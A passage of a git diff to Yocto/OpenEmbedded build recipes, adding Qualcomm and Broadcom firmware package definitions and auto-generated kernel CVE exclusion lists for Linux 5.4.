+ ${nonarch_base_libdir}/firmware/cypress/cyfmac4354-sdio.bin \
+"
+FILES_${PN}-bcm4356-pcie = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4356-pcie.* \
+ ${nonarch_base_libdir}/firmware/cypress/cyfmac4356-pcie.* \
+"
FILES_${PN}-bcm4373 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4373-sdio.bin \
${nonarch_base_libdir}/firmware/brcm/brcmfmac4373.bin \
+ ${nonarch_base_libdir}/firmware/cypress/cyfmac4373-sdio.bin \
+ ${nonarch_base_libdir}/firmware/brcm/brcmfmac4373-sdio.clm_blob \
"
LICENSE_${PN}-bcm-0bb4-0306 = "Firmware-cypress"
@@ -893,27 +974,100 @@ RDEPENDS_${PN}-qat = "${PN}-qat-license"
# For QCOM VPU/GPU and SDM845
LICENSE_${PN}-qcom-license = "Firmware-qcom"
+LICENSE_${PN}-qcom-yamato-license = "Firmware-qcom-yamato"
+LICENSE_${PN}-qcom-venus-1.8 = "Firmware-qcom"
+LICENSE_${PN}-qcom-venus-4.2 = "Firmware-qcom"
+LICENSE_${PN}-qcom-venus-5.2 = "Firmware-qcom"
+LICENSE_${PN}-qcom-venus-5.4 = "Firmware-qcom"
+LICENSE_${PN}-qcom-vpu-1.0 = "Firmware-qcom"
+LICENSE_${PN}-qcom-vpu-2.0 = "Firmware-qcom"
+LICENSE_${PN}-qcom-adreno-a2xx = "Firmware-qcom Firmware-qcom-yamato"
+LICENSE_${PN}-qcom-adreno-a3xx = "Firmware-qcom"
+LICENSE_${PN}-qcom-adreno-a4xx = "Firmware-qcom"
+LICENSE_${PN}-qcom-adreno-a530 = "Firmware-qcom"
+LICENSE_${PN}-qcom-adreno-a630 = "Firmware-qcom"
+LICENSE_${PN}-qcom-adreno-a650 = "Firmware-qcom"
+LICENSE_${PN}-qcom-adreno-a660 = "Firmware-qcom"
+LICENSE_${PN}-qcom-apq8016-modem = "Firmware-qcom"
+LICENSE_${PN}-qcom-apq8016-wifi = "Firmware-qcom"
+LICENSE_${PN}-qcom-apq8096-audio = "Firmware-qcom"
+LICENSE_${PN}-qcom-apq8096-adreno = "Firmware-qcom"
+LICENSE_${PN}-qcom-apq8096-modem = "Firmware-qcom"
+LICENSE_${PN}-qcom-sc8280xp-lenovo-x13s-audio = "Firmware-qcom"
+LICENSE_${PN}-qcom-sc8280xp-lenovo-x13s-adreno = "Firmware-qcom"
+LICENSE_${PN}-qcom-sc8280xp-lenovo-x13s-compute = "Firmware-qcom"
+LICENSE_${PN}-qcom-sc8280xp-lenovo-x13s-sensors = "Firmware-qcom"
+LICENSE_${PN}-qcom-sdm845-audio = "Firmware-qcom"
+LICENSE_${PN}-qcom-sdm845-adreno = "Firmware-qcom"
+LICENSE_${PN}-qcom-sdm845-compute = "Firmware-qcom"
+LICENSE_${PN}-qcom-sdm845-modem = "Firmware-qcom"
+LICENSE_${PN}-qcom-sm8250-audio = "Firmware-qcom"
+LICENSE_${PN}-qcom-sm8250-adreno = "Firmware-qcom"
+LICENSE_${PN}-qcom-sm8250-compute = "Firmware-qcom"
+
FILES_${PN}-qcom-license = "${nonarch_base_libdir}/firmware/LICENSE.qcom ${nonarch_base_libdir}/firmware/qcom/NOTICE.txt"
+FILES_${PN}-qcom-yamato-license = "${nonarch_base_libdir}/firmware/LICENSE.qcom_yamato"
FILES_${PN}-qcom-venus-1.8 = "${nonarch_base_libdir}/firmware/qcom/venus-1.8/*"
FILES_${PN}-qcom-venus-4.2 = "${nonarch_base_libdir}/firmware/qcom/venus-4.2/*"
FILES_${PN}-qcom-venus-5.2 = "${nonarch_base_libdir}/firmware/qcom/venus-5.2/*"
FILES_${PN}-qcom-venus-5.4 = "${nonarch_base_libdir}/firmware/qcom/venus-5.4/*"
-FILES_${PN}-qcom-adreno-a3xx = "${nonarch_base_libdir}/firmware/qcom/a300_*.fw ${nonarch_base_libdir}/firmware/a300_*.fw"
-FILES_${PN}-qcom-adreno-a530 = "${nonarch_base_libdir}/firmware/qcom/a530*.*"
-FILES_${PN}-qcom-adreno-a630 = "${nonarch_base_libdir}/firmware/qcom/a630*.* ${nonarch_base_libdir}/firmware/qcom/sdm845/a630*.*"
+FILES_${PN}-qcom-vpu-1.0 = "${nonarch_base_libdir}/firmware/qcom/vpu-1.0/*"
+FILES_${PN}-qcom-vpu-2.0 = "${nonarch_base_libdir}/firmware/qcom/vpu-2.0/*"
+FILES_${PN}-qcom-adreno-a2xx = "${nonarch_base_libdir}/firmware/qcom/leia_*.fw ${nonarch_base_libdir}/firmware/qcom/yamato_*.fw"
+FILES_${PN}-qcom-adreno-a3xx = "${nonarch_base_libdir}/firmware/qcom/a3*_*.fw ${nonarch_base_libdir}/firmware/a300_*.fw"
+FILES_${PN}-qcom-adreno-a4xx = "${nonarch_base_libdir}/firmware/qcom/a4*_*.fw"
+FILES_${PN}-qcom-adreno-a530 = "${nonarch_base_libdir}/firmware/qcom/a530*.fw*"
+FILES_${PN}-qcom-adreno-a630 = "${nonarch_base_libdir}/firmware/qcom/a630*.*"
+FILES_${PN}-qcom-adreno-a650 = "${nonarch_base_libdir}/firmware/qcom/a650*.*"
+FILES_${PN}-qcom-adreno-a660 = "${nonarch_base_libdir}/firmware/qcom/a660*.*"
+FILES_${PN}-qcom-apq8016-modem = "${nonarch_base_libdir}/firmware/qcom/apq8016/mba.mbn ${nonarch_base_libdir}/firmware/qcom/apq8016/modem.mbn"
+FILES_${PN}-qcom-apq8016-wifi = "${nonarch_base_libdir}/firmware/qcom/apq8016/wcnss.mbn ${nonarch_base_libdir}/firmware/qcom/apq8016/WCNSS*"
+FILES_${PN}-qcom-apq8096-adreno = "${nonarch_base_libdir}/firmware/qcom/apq8096/a530_zap.mbn ${nonarch_base_libdir}/firmware/qcom/a530_zap.mdt"
+FILES_${PN}-qcom-apq8096-audio = "${nonarch_base_libdir}/firmware/qcom/apq8096/adsp*.*"
+FILES_${PN}-qcom-apq8096-modem = "${nonarch_base_libdir}/firmware/qcom/apq8096/mba.mbn ${nonarch_base_libdir}/firmware/qcom/apq8096/modem*.* ${nonarch_base_libdir}/firmware/qcom/apq8096/wlanmdsp.mbn"
+FILES_${PN}-qcom-sc8280xp-lenovo-x13s-compat = "${nonarch_base_libdir}/firmware/qcom/LENOVO/21BX"
+FILES_${PN}-qcom-sc8280xp-lenovo-x13s-audio = "${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/*adsp*.* ${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/battmgr.jsn"
+FILES_${PN}-qcom-sc8280xp-lenovo-x13s-adreno = "${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/qcdxkmsuc8280.mbn"
+FILES_${PN}-qcom-sc8280xp-lenovo-x13s-compute = "${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/*cdsp*.*"
+FILES_${PN}-qcom-sc8280xp-lenovo-x13s-sensors = "${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/*slpi*.*"
+FILES_${PN}-qcom-sdm845-adreno = "${nonarch_base_libdir}/firmware/qcom/sdm845/a630*.*"
FILES_${PN}-qcom-sdm845-audio = "${nonarch_base_libdir}/firmware/qcom/sdm845/adsp*.*"
FILES_${PN}-qcom-sdm845-compute = "${nonarch_base_libdir}/firmware/qcom/sdm845/cdsp*.*"
FILES_${PN}-qcom-sdm845-modem = "${nonarch_base_libdir}/firmware/qcom/sdm845/mba.mbn ${nonarch_base_libdir}/firmware/qcom/sdm845/modem*.* ${nonarch_base_libdir}/firmware/qcom/sdm845/wlanmdsp.mbn"
+FILES_${PN}-qcom-sm8250-adreno = "${nonarch_base_libdir}/firmware/qcom/sm8250/a650*.*"
+FILES_${PN}-qcom-sm8250-audio = "${nonarch_base_libdir}/firmware/qcom/sm8250/adsp*.*"
+FILES_${PN}-qcom-sm8250-compute = "${nonarch_base_libdir}/firmware/qcom/sm8250/cdsp*.*"
RDEPENDS_${PN}-qcom-venus-1.8 = "${PN}-qcom-license"
RDEPENDS_${PN}-qcom-venus-4.2 = "${PN}-qcom-license"
RDEPENDS_${PN}-qcom-venus-5.2 = "${PN}-qcom-license"
RDEPENDS_${PN}-qcom-venus-5.4 = "${PN}-qcom-license"
-RDEPENDS_${PN}-qcom-adreno-a3xx = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-vpu-1.0 = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-vpu-2.0 = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-adreno-a2xx = "${PN}-qcom-license ${PN}-qcom-yamato-license"
+RDEPENDS_${PN}-qcom-adreno-a3xx = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-adreno-a4xx = "${PN}-qcom-license"
RDEPENDS_${PN}-qcom-adreno-a530 = "${PN}-qcom-license"
RDEPENDS_${PN}-qcom-adreno-a630 = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-adreno-a650 = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-adreno-a660 = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-apq8016-modem = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-apq8016-wifi = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-apq8096-audio = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-apq8096-modem = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-sc8280xp-lenovo-x13s-audio = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-sc8280xp-lenovo-x13s-adreno = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-sc8280xp-lenovo-x13s-compute = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-sc8280xp-lenovo-x13s-sensors = "${PN}-qcom-license"
RDEPENDS_${PN}-qcom-sdm845-audio = "${PN}-qcom-license"
RDEPENDS_${PN}-qcom-sdm845-compute = "${PN}-qcom-license"
RDEPENDS_${PN}-qcom-sdm845-modem = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-sm8250-audio = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-sm8250-compute = "${PN}-qcom-license"
+
+RRECOMMENDS_${PN}-qcom-sc8280xp-lenovo-x13s-audio = "${PN}-qcom-sc8280xp-lenovo-x13s-compat"
+RRECOMMENDS_${PN}-qcom-sc8280xp-lenovo-x13s-adreno = "${PN}-qcom-sc8280xp-lenovo-x13s-compat"
+RRECOMMENDS_${PN}-qcom-sc8280xp-lenovo-x13s-compute = "${PN}-qcom-sc8280xp-lenovo-x13s-compat"
+RRECOMMENDS_${PN}-qcom-sc8280xp-lenovo-x13s-sensors = "${PN}-qcom-sc8280xp-lenovo-x13s-compat"
FILES_${PN}-liquidio = "${nonarch_base_libdir}/firmware/liquidio"
@@ -942,7 +1096,6 @@ LICENSE_${PN} = "\
& Firmware-fw_sst_0f28 \
& Firmware-go7007 \
& Firmware-hfi1_firmware \
- & Firmware-i2400m \
& Firmware-ibt_firmware \
& Firmware-it913x \
& Firmware-IntcSST2 \
@@ -963,7 +1116,6 @@ LICENSE_${PN} = "\
& Firmware-ralink-firmware \
& Firmware-imx-sdma_firmware \
& Firmware-siano \
- & Firmware-tda7706-firmware \
& Firmware-ti-connectivity \
& Firmware-ti-keystone \
& Firmware-ueagle-atm4-firmware \
@@ -996,3 +1148,6 @@ python populate_packages_prepend () {
# Firmware files are generally not ran on the CPU, so they can be
# allarch despite being architecture specific
INSANE_SKIP = "arch"
+
+# Don't warn about already stripped files
+INSANE_SKIP_${PN} = "already-stripped"
diff --git a/meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc b/meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc
index 4ad74a27e9..2d4429b6b4 100644
--- a/meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc
+++ b/meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc
@@ -1,4 +1,6 @@
SUMMARY = "Sanitized set of kernel headers for the C library's use"
+HOMEPAGE = "https://www.kernel.org/"
+DESCRIPTION = "Designed to maintain an Application Programming Interface (API) stable version of the Linux headers"
SECTION = "devel"
LICENSE = "GPLv2"
diff --git a/meta/recipes-kernel/linux/cve-exclusion.inc b/meta/recipes-kernel/linux/cve-exclusion.inc
new file mode 100644
index 0000000000..efc8b09475
--- /dev/null
+++ b/meta/recipes-kernel/linux/cve-exclusion.inc
@@ -0,0 +1,13 @@
+# Kernel CVE exclusion file
+
+# https://nvd.nist.gov/vuln/detail/CVE-2020-29373
+# Patched in kernel since v5.6 ff002b30181d30cdfbca316dadd099c3ca0d739c
+# Backported in version v5.4.24 cac68d12c531aa3010509a5a55a5dfd18dedaa80
+CVE_CHECK_WHITELIST += "CVE-2020-29373"
+
+# https://nvd.nist.gov/vuln/detail/CVE-2022-39188
+# Patched in kernel since v5.19 b67fbebd4cf980aecbcc750e1462128bffe8ae15
+# Backported in version v5.4.212 c9c5501e815132530d741ec9fdd22657f91656bc
+# Backported in version v5.10.141 895428ee124ad70b9763259308354877b725c31d
+# Backported in version v5.15.65 3ffb97fce282df03723995f5eed6a559d008078e
+CVE_CHECK_WHITELIST += "CVE-2022-39188"
diff --git a/meta/recipes-kernel/linux/cve-exclusion_5.4.inc b/meta/recipes-kernel/linux/cve-exclusion_5.4.inc
new file mode 100644
index 0000000000..b0b33bcc1d
--- /dev/null
+++ b/meta/recipes-kernel/linux/cve-exclusion_5.4.inc
@@ -0,0 +1,9445 @@
+
+# Auto-generated CVE metadata, DO NOT EDIT BY HAND.
+# Generated at 2024-04-14 04:45:05.585211 for version 5.4.273
+
+python check_kernel_cve_status_version() {
+ this_version = "5.4.273"
+ kernel_version = d.getVar("LINUX_VERSION")
+ if kernel_version != this_version:
+ bb.warn("Kernel CVE status needs updating: generated for %s but kernel is %s" % (this_version, kernel_version))
+}
+do_cve_check[prefuncs] += "check_kernel_cve_status_version"
+
+# fixed-version: Fixed after version 2.6.12rc2
+CVE_CHECK_WHITELIST += "CVE-2003-1604"
+
+# fixed-version: Fixed after version 3.6rc1
+CVE_CHECK_WHITELIST += "CVE-2004-0230"
+
+# CVE-2005-3660 has no known resolution
+
+# fixed-version: Fixed after version 2.6.26rc5
+CVE_CHECK_WHITELIST += "CVE-2006-3635"
+
+# fixed-version: Fixed after version 2.6.19rc3
+CVE_CHECK_WHITELIST += "CVE-2006-5331"
+
+# fixed-version: Fixed after version 2.6.19rc2
+CVE_CHECK_WHITELIST += "CVE-2006-6128"
+
+# CVE-2007-3719 has no known resolution
+
+# fixed-version: Fixed after version 2.6.12rc2
+CVE_CHECK_WHITELIST += "CVE-2007-4774"
+
+# fixed-version: Fixed after version 2.6.24rc6
+CVE_CHECK_WHITELIST += "CVE-2007-6761"
+
+# fixed-version: Fixed after version 2.6.20rc5
+CVE_CHECK_WHITELIST += "CVE-2007-6762"
+
+# CVE-2008-2544 has no known resolution
+
+# CVE-2008-4609 has no known resolution
+
+# fixed-version: Fixed after version 2.6.25rc1
+CVE_CHECK_WHITELIST += "CVE-2008-7316"
+
+# fixed-version: Fixed after version 2.6.31rc6
+CVE_CHECK_WHITELIST += "CVE-2009-2692"
+
+# fixed-version: Fixed after version 2.6.23rc9
+CVE_CHECK_WHITELIST += "CVE-2010-0008"
+
+# fixed-version: Fixed after version 2.6.36rc5
+CVE_CHECK_WHITELIST += "CVE-2010-3432"
+
+# CVE-2010-4563 has no known resolution
+
+# fixed-version: Fixed after version 2.6.37rc6
+CVE_CHECK_WHITELIST += "CVE-2010-4648"
+
+# fixed-version: Fixed after version 2.6.38rc1
+CVE_CHECK_WHITELIST += "CVE-2010-5313"
+
+# CVE-2010-5321 has no known resolution
+
+# fixed-version: Fixed after version 2.6.35rc1
+CVE_CHECK_WHITELIST += "CVE-2010-5328"
+
+# fixed-version: Fixed after version 2.6.39rc1
+CVE_CHECK_WHITELIST += "CVE-2010-5329"
+
+# fixed-version: Fixed after version 2.6.34rc7
+CVE_CHECK_WHITELIST += "CVE-2010-5331"
+
+# fixed-version: Fixed after version 2.6.37rc1
+CVE_CHECK_WHITELIST += "CVE-2010-5332"
+
+# fixed-version: Fixed after version 3.2rc1
+CVE_CHECK_WHITELIST += "CVE-2011-4098"
+
+# fixed-version: Fixed after version 3.3rc1
+CVE_CHECK_WHITELIST += "CVE-2011-4131"
+
+# fixed-version: Fixed after version 3.2rc1
+CVE_CHECK_WHITELIST += "CVE-2011-4915"
+
+# CVE-2011-4916 has no known resolution
+
+# CVE-2011-4917 has no known resolution
+
+# fixed-version: Fixed after version 3.2rc1
+CVE_CHECK_WHITELIST += "CVE-2011-5321"
+
+# fixed-version: Fixed after version 3.1rc1
+CVE_CHECK_WHITELIST += "CVE-2011-5327"
+
+# fixed-version: Fixed after version 3.7rc2
+CVE_CHECK_WHITELIST += "CVE-2012-0957"
+
+# fixed-version: Fixed after version 3.5rc1
+CVE_CHECK_WHITELIST += "CVE-2012-2119"
+
+# fixed-version: Fixed after version 3.5rc1
+CVE_CHECK_WHITELIST += "CVE-2012-2136"
+
+# fixed-version: Fixed after version 3.5rc2
+CVE_CHECK_WHITELIST += "CVE-2012-2137"
+
+# fixed-version: Fixed after version 3.4rc6
+CVE_CHECK_WHITELIST += "CVE-2012-2313"
+
+# fixed-version: Fixed after version 3.4rc6
+CVE_CHECK_WHITELIST += "CVE-2012-2319"
+
+# fixed-version: Fixed after version 3.13rc4
+CVE_CHECK_WHITELIST += "CVE-2012-2372"
+
+# fixed-version: Fixed after version 3.4rc1
+CVE_CHECK_WHITELIST += "CVE-2012-2375"
+
+# fixed-version: Fixed after version 3.5rc1
+CVE_CHECK_WHITELIST += "CVE-2012-2390"
+
+# fixed-version: Fixed after version 3.5rc4
+CVE_CHECK_WHITELIST += "CVE-2012-2669"
+
+# fixed-version: Fixed after version 2.6.34rc1
+CVE_CHECK_WHITELIST += "CVE-2012-2744"
+
+# fixed-version: Fixed after version 3.4rc3
+CVE_CHECK_WHITELIST += "CVE-2012-2745"
+
+# fixed-version: Fixed after version 3.5rc6
+CVE_CHECK_WHITELIST += "CVE-2012-3364"
+
+# fixed-version: Fixed after version 3.4rc5
+CVE_CHECK_WHITELIST += "CVE-2012-3375"
+
+# fixed-version: Fixed after version 3.5rc5
+CVE_CHECK_WHITELIST += "CVE-2012-3400"
+
+# fixed-version: Fixed after version 3.6rc2
+CVE_CHECK_WHITELIST += "CVE-2012-3412"
+
+# fixed-version: Fixed after version 3.6rc1
+CVE_CHECK_WHITELIST += "CVE-2012-3430"
+
+# fixed-version: Fixed after version 2.6.19rc4
+CVE_CHECK_WHITELIST += "CVE-2012-3510"
+
+# fixed-version: Fixed after version 3.5rc6
+CVE_CHECK_WHITELIST += "CVE-2012-3511"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-3520"
+
+# fixed-version: Fixed after version 3.0rc1
+CVE_CHECK_WHITELIST += "CVE-2012-3552"
+
+# Skipping CVE-2012-4220, no affected_versions
+
+# Skipping CVE-2012-4221, no affected_versions
+
+# Skipping CVE-2012-4222, no affected_versions
+
+# fixed-version: Fixed after version 3.4rc1
+CVE_CHECK_WHITELIST += "CVE-2012-4398"
+
+# fixed-version: Fixed after version 2.6.36rc4
+CVE_CHECK_WHITELIST += "CVE-2012-4444"
+
+# fixed-version: Fixed after version 3.7rc6
+CVE_CHECK_WHITELIST += "CVE-2012-4461"
+
+# fixed-version: Fixed after version 3.6rc5
+CVE_CHECK_WHITELIST += "CVE-2012-4467"
+
+# fixed-version: Fixed after version 3.7rc3
+CVE_CHECK_WHITELIST += "CVE-2012-4508"
+
+# fixed-version: Fixed after version 3.8rc1
+CVE_CHECK_WHITELIST += "CVE-2012-4530"
+
+# CVE-2012-4542 has no known resolution
+
+# fixed-version: Fixed after version 3.7rc4
+CVE_CHECK_WHITELIST += "CVE-2012-4565"
+
+# fixed-version: Fixed after version 3.8rc1
+CVE_CHECK_WHITELIST += "CVE-2012-5374"
+
+# fixed-version: Fixed after version 3.8rc1
+CVE_CHECK_WHITELIST += "CVE-2012-5375"
+
+# fixed-version: Fixed after version 3.6rc1
+CVE_CHECK_WHITELIST += "CVE-2012-5517"
+
+# fixed-version: Fixed after version 3.6rc7
+CVE_CHECK_WHITELIST += "CVE-2012-6536"
+
+# fixed-version: Fixed after version 3.6rc7
+CVE_CHECK_WHITELIST += "CVE-2012-6537"
+
+# fixed-version: Fixed after version 3.6rc7
+CVE_CHECK_WHITELIST += "CVE-2012-6538"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-6539"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-6540"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-6541"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-6542"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-6543"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-6544"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-6545"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-6546"
+
+# fixed-version: Fixed after version 3.6rc1
+CVE_CHECK_WHITELIST += "CVE-2012-6547"
+
+# fixed-version: Fixed after version 3.6rc1
+CVE_CHECK_WHITELIST += "CVE-2012-6548"
+
+# fixed-version: Fixed after version 3.6rc1
+CVE_CHECK_WHITELIST += "CVE-2012-6549"
+
+# fixed-version: Fixed after version 3.3rc1
+CVE_CHECK_WHITELIST += "CVE-2012-6638"
+
+# fixed-version: Fixed after version 3.6rc2
+CVE_CHECK_WHITELIST += "CVE-2012-6647"
+
+# fixed-version: Fixed after version 3.6
+CVE_CHECK_WHITELIST += "CVE-2012-6657"
+
+# fixed-version: Fixed after version 3.6rc5
+CVE_CHECK_WHITELIST += "CVE-2012-6689"
+
+# fixed-version: Fixed after version 3.5rc1
+CVE_CHECK_WHITELIST += "CVE-2012-6701"
+
+# fixed-version: Fixed after version 3.7rc1
+CVE_CHECK_WHITELIST += "CVE-2012-6703"
+
+# fixed-version: Fixed after version 3.5rc1
+CVE_CHECK_WHITELIST += "CVE-2012-6704"
+
+# fixed-version: Fixed after version 3.4rc1
+CVE_CHECK_WHITELIST += "CVE-2012-6712"
+
+# fixed-version: Fixed after version 3.9rc1
+CVE_CHECK_WHITELIST += "CVE-2013-0160"
+
+# fixed-version: Fixed after version 3.8rc5
+CVE_CHECK_WHITELIST += "CVE-2013-0190"
+
+# fixed-version: Fixed after version 3.8rc7
+CVE_CHECK_WHITELIST += "CVE-2013-0216"
+
+# fixed-version: Fixed after version 3.8rc7
+CVE_CHECK_WHITELIST += "CVE-2013-0217"
+
+# fixed-version: Fixed after version 3.8
+CVE_CHECK_WHITELIST += "CVE-2013-0228"
+
+# fixed-version: Fixed after version 3.8rc7
+CVE_CHECK_WHITELIST += "CVE-2013-0231"
+
+# fixed-version: Fixed after version 3.8rc6
+CVE_CHECK_WHITELIST += "CVE-2013-0268"
+
+# fixed-version: Fixed after version 3.8
+CVE_CHECK_WHITELIST += "CVE-2013-0290"
+
+# fixed-version: Fixed after version 3.7rc1
+CVE_CHECK_WHITELIST += "CVE-2013-0309"
+
+# fixed-version: Fixed after version 3.5
+CVE_CHECK_WHITELIST += "CVE-2013-0310"
+
+# fixed-version: Fixed after version 3.7rc8
+CVE_CHECK_WHITELIST += "CVE-2013-0311"
+
+# fixed-version: Fixed after version 3.8rc5
+CVE_CHECK_WHITELIST += "CVE-2013-0313"
+
+# fixed-version: Fixed after version 3.11rc7
+CVE_CHECK_WHITELIST += "CVE-2013-0343"
+
+# fixed-version: Fixed after version 3.8rc6
+CVE_CHECK_WHITELIST += "CVE-2013-0349"
+
+# fixed-version: Fixed after version 3.8rc5
+CVE_CHECK_WHITELIST += "CVE-2013-0871"
+
+# fixed-version: Fixed after version 3.9rc4
+CVE_CHECK_WHITELIST += "CVE-2013-0913"
+
+# fixed-version: Fixed after version 3.9rc3
+CVE_CHECK_WHITELIST += "CVE-2013-0914"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-1059"
+
+# fixed-version: Fixed after version 3.9rc1
+CVE_CHECK_WHITELIST += "CVE-2013-1763"
+
+# fixed-version: Fixed after version 3.9rc1
+CVE_CHECK_WHITELIST += "CVE-2013-1767"
+
+# fixed-version: Fixed after version 3.5rc1
+CVE_CHECK_WHITELIST += "CVE-2013-1772"
+
+# fixed-version: Fixed after version 3.3rc1
+CVE_CHECK_WHITELIST += "CVE-2013-1773"
+
+# fixed-version: Fixed after version 3.8rc5
+CVE_CHECK_WHITELIST += "CVE-2013-1774"
+
+# fixed-version: Fixed after version 3.9rc3
+CVE_CHECK_WHITELIST += "CVE-2013-1792"
+
+# fixed-version: Fixed after version 3.9rc4
+CVE_CHECK_WHITELIST += "CVE-2013-1796"
+
+# fixed-version: Fixed after version 3.9rc4
+CVE_CHECK_WHITELIST += "CVE-2013-1797"
+
+# fixed-version: Fixed after version 3.9rc4
+CVE_CHECK_WHITELIST += "CVE-2013-1798"
+
+# fixed-version: Fixed after version 3.8rc6
+CVE_CHECK_WHITELIST += "CVE-2013-1819"
+
+# fixed-version: Fixed after version 3.6rc7
+CVE_CHECK_WHITELIST += "CVE-2013-1826"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2013-1827"
+
+# fixed-version: Fixed after version 3.9rc2
+CVE_CHECK_WHITELIST += "CVE-2013-1828"
+
+# fixed-version: Fixed after version 3.9rc3
+CVE_CHECK_WHITELIST += "CVE-2013-1848"
+
+# fixed-version: Fixed after version 3.9rc3
+CVE_CHECK_WHITELIST += "CVE-2013-1858"
+
+# fixed-version: Fixed after version 3.9rc3
+CVE_CHECK_WHITELIST += "CVE-2013-1860"
+
+# fixed-version: Fixed after version 3.7rc3
+CVE_CHECK_WHITELIST += "CVE-2013-1928"
+
+# fixed-version: Fixed after version 3.9rc6
+CVE_CHECK_WHITELIST += "CVE-2013-1929"
+
+# Skipping CVE-2013-1935, no affected_versions
+
+# fixed-version: Fixed after version 3.0rc1
+CVE_CHECK_WHITELIST += "CVE-2013-1943"
+
+# fixed-version: Fixed after version 3.9rc5
+CVE_CHECK_WHITELIST += "CVE-2013-1956"
+
+# fixed-version: Fixed after version 3.9rc5
+CVE_CHECK_WHITELIST += "CVE-2013-1957"
+
+# fixed-version: Fixed after version 3.9rc5
+CVE_CHECK_WHITELIST += "CVE-2013-1958"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-1959"
+
+# fixed-version: Fixed after version 3.9rc8
+CVE_CHECK_WHITELIST += "CVE-2013-1979"
+
+# fixed-version: Fixed after version 3.8rc2
+CVE_CHECK_WHITELIST += "CVE-2013-2015"
+
+# fixed-version: Fixed after version 2.6.34
+CVE_CHECK_WHITELIST += "CVE-2013-2017"
+
+# fixed-version: Fixed after version 3.8rc4
+CVE_CHECK_WHITELIST += "CVE-2013-2058"
+
+# fixed-version: Fixed after version 3.9rc8
+CVE_CHECK_WHITELIST += "CVE-2013-2094"
+
+# fixed-version: Fixed after version 2.6.34rc4
+CVE_CHECK_WHITELIST += "CVE-2013-2128"
+
+# fixed-version: Fixed after version 3.11rc3
+CVE_CHECK_WHITELIST += "CVE-2013-2140"
+
+# fixed-version: Fixed after version 3.9rc8
+CVE_CHECK_WHITELIST += "CVE-2013-2141"
+
+# fixed-version: Fixed after version 3.9rc8
+CVE_CHECK_WHITELIST += "CVE-2013-2146"
+
+# fixed-version: Fixed after version 3.12rc3
+CVE_CHECK_WHITELIST += "CVE-2013-2147"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2148"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2164"
+
+# Skipping CVE-2013-2188, no affected_versions
+
+# fixed-version: Fixed after version 3.9rc4
+CVE_CHECK_WHITELIST += "CVE-2013-2206"
+
+# Skipping CVE-2013-2224, no affected_versions
+
+# fixed-version: Fixed after version 3.10
+CVE_CHECK_WHITELIST += "CVE-2013-2232"
+
+# fixed-version: Fixed after version 3.10
+CVE_CHECK_WHITELIST += "CVE-2013-2234"
+
+# fixed-version: Fixed after version 3.9rc6
+CVE_CHECK_WHITELIST += "CVE-2013-2237"
+
+# Skipping CVE-2013-2239, no affected_versions
+
+# fixed-version: Fixed after version 3.9rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2546"
+
+# fixed-version: Fixed after version 3.9rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2547"
+
+# fixed-version: Fixed after version 3.9rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2548"
+
+# fixed-version: Fixed after version 3.9rc8
+CVE_CHECK_WHITELIST += "CVE-2013-2596"
+
+# fixed-version: Fixed after version 3.9rc3
+CVE_CHECK_WHITELIST += "CVE-2013-2634"
+
+# fixed-version: Fixed after version 3.9rc3
+CVE_CHECK_WHITELIST += "CVE-2013-2635"
+
+# fixed-version: Fixed after version 3.9rc3
+CVE_CHECK_WHITELIST += "CVE-2013-2636"
+
+# fixed-version: Fixed after version 3.10rc4
+CVE_CHECK_WHITELIST += "CVE-2013-2850"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2851"
+
+# fixed-version: Fixed after version 3.10rc6
+CVE_CHECK_WHITELIST += "CVE-2013-2852"
+
